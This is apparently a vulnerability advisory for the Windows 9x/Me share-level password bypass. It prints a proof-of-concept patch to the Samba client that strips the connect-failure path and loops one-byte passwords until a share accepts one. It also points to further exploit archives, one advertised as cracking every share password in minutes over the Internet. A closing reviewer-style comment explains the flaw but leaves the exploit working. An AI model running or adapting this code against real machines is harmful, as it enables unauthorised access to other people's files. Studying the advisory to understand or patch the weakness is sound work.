Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability
Nsfocus <security@nsfocus.com> has released the following proof-of-concept code:

--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999 +++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000 @@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve DEBUG(4,(" session setup ok\n")); +/* if (!cli_send_tconX(c, share, "?????", password, strlen(password)+1)) { DEBUG(0,("tree connect failed: %s\n", cli_errstr(c))); cli_shutdown(c); return NULL; } +*/ + + password[0] = 0; + c->sec_mode = 0; + do{ + + password[0]+=1; + + }while(!cli_send_tconX(c, share, "?????", password, 1)); DEBUG(4,(" tconx ok\n"));

Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de> has released the following sharehack2.zip for the password verification exploit discovered by Nsfocus Security Team. The program hacks every win9x/me share password in less than 2 minutes, 10 minutes over the Internet (C source code included).

Gabriel Maggiotti <gmaggiot@ciudad.com.ar> has provided the following exploit: netbios.tar.gz
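
Review bot: the do/while loop added in do_connect() has no exit other than a successful cli_send_tconX(). password[0] eventually wraps around, and the original failure branch (the DEBUG(0, "tree connect failed") call, cli_shutdown(c) and return NULL) is commented out rather than kept, so against a server that never accepts the connect the client spins forever without reporting the error or closing the connection. Bound the loop and restore that failure path. The length argument also changes from strlen(password)+1 to a hard-coded 1, and c->sec_mode is forced to 0, with no comment explaining either. A comment should state that the one-byte length is the condition under test: a server that accepts it is checking only as many password bytes as the client claims to send, which is the behaviour that has to be corrected on the Windows 9x/Me side.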